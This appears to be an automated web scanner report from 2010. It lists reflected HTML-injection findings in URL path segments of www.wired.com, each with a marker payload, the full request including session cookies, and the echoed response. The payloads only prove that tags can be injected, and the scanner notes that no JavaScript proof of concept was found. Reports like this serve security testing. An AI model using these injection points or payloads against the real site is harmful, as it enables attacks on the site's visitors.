HTTP/1.1 404 Not Found Server: Apache/2.0.52 (Red Hat) Content-Type: text/html; charset=UTF-8 Content-Length: 29356 Vary: Accept-Encoding Cache-Control: max-age=233 Expires: Sun, 21 Nov 2010 23:17:01 GMT Date: Sun, 21 Nov 2010 23:13:08 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt ...[SNIP]... <body class="s_techbiz3f59d"><a>02f6b01dd4f ss_it"> ...[SNIP]...
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b60b3"><a>63c96a35974 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /techbiz/itb60b3"><a>63c96a35974 HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 404 Not Found Server: Apache/2.0.52 (Red Hat) Content-Type: text/html; charset=UTF-8 Content-Length: 29356 Vary: Accept-Encoding Cache-Control: max-age=564 Expires: Sun, 21 Nov 2010 23:22:55 GMT Date: Sun, 21 Nov 2010 23:13:31 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt ...[SNIP]... <body class="s_techbiz ss_itb60b3"><a>63c96a35974"> ...[SNIP]...
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 9c6b7"><a>d1b4a2e6128 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /techbiz9c6b7"><a>d1b4a2e6128/it/magazine/16-05/mf_amazon HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 404 Not Found Server: Apache/2.0.52 (Red Hat) Content-Type: text/html; charset=UTF-8 Content-Length: 29392 Vary: Accept-Encoding Cache-Control: max-age=240 Expires: Sun, 21 Nov 2010 23:17:10 GMT Date: Sun, 21 Nov 2010 23:13:10 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt ...[SNIP]... <body class="s_techbiz9c6b7"><a>d1b4a2e6128 ss_it c_magazine"> ...[SNIP]...
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3f14a"><a>4c2c28c6943 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /techbiz/it3f14a"><a>4c2c28c6943/magazine/16-05/mf_amazon HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 404 Not Found Server: Apache/2.0.52 (Red Hat) Content-Type: text/html; charset=UTF-8 Content-Length: 29392 Vary: Accept-Encoding Cache-Control: max-age=572 Expires: Sun, 21 Nov 2010 23:22:58 GMT Date: Sun, 21 Nov 2010 23:13:26 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt ...[SNIP]... <body class="s_techbiz ss_it3f14a"><a>4c2c28c6943 c_magazine"> ...[SNIP]...
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 765b7"><a>9a5bd1ea91f was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /techbiz/it/magazine765b7"><a>9a5bd1ea91f/16-05/mf_amazon HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 404 Not Found Server: Apache/2.0.52 (Red Hat) Content-Type: text/html; charset=UTF-8 Content-Length: 29392 Vary: Accept-Encoding Cache-Control: max-age=600 Expires: Sun, 21 Nov 2010 23:23:44 GMT Date: Sun, 21 Nov 2010 23:13:44 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt ...[SNIP]... <body class="s_techbiz ss_it c_magazine765b7"><a>9a5bd1ea91f"> ...[SNIP]...
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload abdb7"><a>a468003d116 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /techbizabdb7"><a>a468003d116/media HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 404 Not Found Server: Apache/2.0.52 (Red Hat) Content-Type: text/html; charset=UTF-8 Content-Length: 29362 Vary: Accept-Encoding Cache-Control: max-age=231 Expires: Sun, 21 Nov 2010 23:17:01 GMT Date: Sun, 21 Nov 2010 23:13:10 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt ...[SNIP]... <body class="s_techbizabdb7"><a>a468003d116 ss_media"> ...[SNIP]...
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7fee9"><a>e9bf0f03e78 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /techbiz/media7fee9"><a>e9bf0f03e78 HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 404 Not Found Server: Apache/2.0.52 (Red Hat) Content-Type: text/html; charset=UTF-8 Content-Length: 29362 Vary: Accept-Encoding Cache-Control: max-age=600 Expires: Sun, 21 Nov 2010 23:23:32 GMT Date: Sun, 21 Nov 2010 23:13:32 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt ...[SNIP]... <body class="s_techbiz ss_media7fee9"><a>e9bf0f03e78"> ...[SNIP]...
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 542e6"><a>86cc52af494 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /techbiz542e6"><a>86cc52af494/media/news/2005/01/66333 HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 404 Not Found Server: Apache/2.0.52 (Red Hat) Content-Type: text/html; charset=UTF-8 Content-Length: 29388 Vary: Accept-Encoding Cache-Control: max-age=600 Expires: Sun, 21 Nov 2010 23:23:28 GMT Date: Sun, 21 Nov 2010 23:13:28 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt ...[SNIP]... <body class="s_techbiz542e6"><a>86cc52af494 ss_media c_news"> ...[SNIP]...
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 20b6b"><a>02038e56cc2 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /techbiz/media20b6b"><a>02038e56cc2/news/2005/01/66333 HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 404 Not Found Server: Apache/2.0.52 (Red Hat) Content-Type: text/html; charset=UTF-8 Content-Length: 29388 Vary: Accept-Encoding Cache-Control: max-age=600 Expires: Sun, 21 Nov 2010 23:23:51 GMT Date: Sun, 21 Nov 2010 23:13:51 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt ...[SNIP]... <body class="s_techbiz ss_media20b6b"><a>02038e56cc2 c_news"> ...[SNIP]...
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 5216c"><a>211e68f195d was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /techbiz/media/news5216c"><a>211e68f195d/2005/01/66333 HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 404 Not Found Server: Apache/2.0.52 (Red Hat) Content-Type: text/html; charset=UTF-8 Content-Length: 29388 Vary: Accept-Encoding Cache-Control: max-age=600 Expires: Sun, 21 Nov 2010 23:24:04 GMT Date: Sun, 21 Nov 2010 23:14:04 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt ...[SNIP]... <body class="s_techbiz ss_media c_news5216c"><a>211e68f195d"> ...[SNIP]...
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 105cf"><a>2b48aae5947 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /techbiz105cf"><a>2b48aae5947/people HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 404 Not Found Server: Apache/2.0.52 (Red Hat) Content-Type: text/html; charset=UTF-8 Content-Length: 29364 Vary: Accept-Encoding Cache-Control: max-age=240 Expires: Sun, 21 Nov 2010 23:17:15 GMT Date: Sun, 21 Nov 2010 23:13:15 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt ...[SNIP]... <body class="s_techbiz105cf"><a>2b48aae5947 ss_people"> ...[SNIP]...
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7412d"><a>a492ab7c0f7 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /techbiz/people7412d"><a>a492ab7c0f7 HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 404 Not Found Server: Apache/2.0.52 (Red Hat) Content-Type: text/html; charset=UTF-8 Content-Length: 29364 Vary: Accept-Encoding Cache-Control: max-age=581 Expires: Sun, 21 Nov 2010 23:23:26 GMT Date: Sun, 21 Nov 2010 23:13:45 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt ...[SNIP]... <body class="s_techbiz ss_people7412d"><a>a492ab7c0f7"> ...[SNIP]...
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7c4ec"><a>b21ee57f40a was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /techbiz7c4ec"><a>b21ee57f40a/startups HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 404 Not Found Server: Apache/2.0.52 (Red Hat) Content-Type: text/html; charset=UTF-8 Content-Length: 29368 Vary: Accept-Encoding Cache-Control: max-age=229 Expires: Sun, 21 Nov 2010 23:17:12 GMT Date: Sun, 21 Nov 2010 23:13:23 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt ...[SNIP]... <body class="s_techbiz7c4ec"><a>b21ee57f40a ss_startups"> ...[SNIP]...
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 8ebc6"><a>440513c64db was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /techbiz/startups8ebc6"><a>440513c64db HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 404 Not Found Server: Apache/2.0.52 (Red Hat) Content-Type: text/html; charset=UTF-8 Content-Length: 29368 Vary: Accept-Encoding Cache-Control: max-age=553 Expires: Sun, 21 Nov 2010 23:23:09 GMT Date: Sun, 21 Nov 2010 23:13:56 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt ...[SNIP]... <body class="s_techbiz ss_startups8ebc6"><a>440513c64db"> ...[SNIP]...
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 63498"><a>895b28be6ed was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ba3b0"><a>461b3fd1bab was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f87df"><a>50a8217cd8e was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /userf87df"><a>50a8217cd8e/logout HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 404 Not Found Server: Apache/2.0.52 (Red Hat) Content-Type: text/html; charset=UTF-8 Content-Length: 29338 Vary: Accept-Encoding Cache-Control: max-age=240 Expires: Mon, 22 Nov 2010 01:12:42 GMT Date: Mon, 22 Nov 2010 01:08:42 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt ...[SNIP]... <body class="s_userf87df"><a>50a8217cd8e ss_logout"> ...[SNIP]...
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 70dfe"><a>d376a663b5f was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /user/logout70dfe"><a>d376a663b5f HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 404 Not Found Server: Apache/2.0.52 (Red Hat) Content-Type: text/html; charset=UTF-8 Expires: Mon, 22 Nov 2010 01:09:38 GMT Cache-Control: max-age=0, no-cache, no-store Pragma: no-cache Date: Mon, 22 Nov 2010 01:09:38 GMT Content-Length: 29338 Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt ...[SNIP]... <body class="s_user ss_logout70dfe"><a>d376a663b5f"> ...[SNIP]...
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c4d9d"><a>3e10b0ccb95 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /userc4d9d"><a>3e10b0ccb95/registration HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 404 Not Found Server: Apache/2.0.52 (Red Hat) Content-Type: text/html; charset=UTF-8 Content-Length: 29350 Vary: Accept-Encoding Cache-Control: max-age=240 Expires: Sun, 21 Nov 2010 22:12:39 GMT Date: Sun, 21 Nov 2010 22:08:39 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt ...[SNIP]... <body class="s_userc4d9d"><a>3e10b0ccb95 ss_registration"> ...[SNIP]...
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 448ce"><a>b37556daedd was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /user/registration448ce"><a>b37556daedd HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 404 Not Found Server: Apache/2.0.52 (Red Hat) Content-Type: text/html; charset=UTF-8 Content-Length: 29350 Vary: Accept-Encoding Expires: Sun, 21 Nov 2010 22:09:04 GMT Cache-Control: max-age=0, no-cache, no-store Pragma: no-cache Date: Sun, 21 Nov 2010 22:09:04 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt ...[SNIP]... <body class="s_user ss_registration448ce"><a>b37556daedd"> ...[SNIP]...
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 9d3d5"><a>c3b051b443f was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
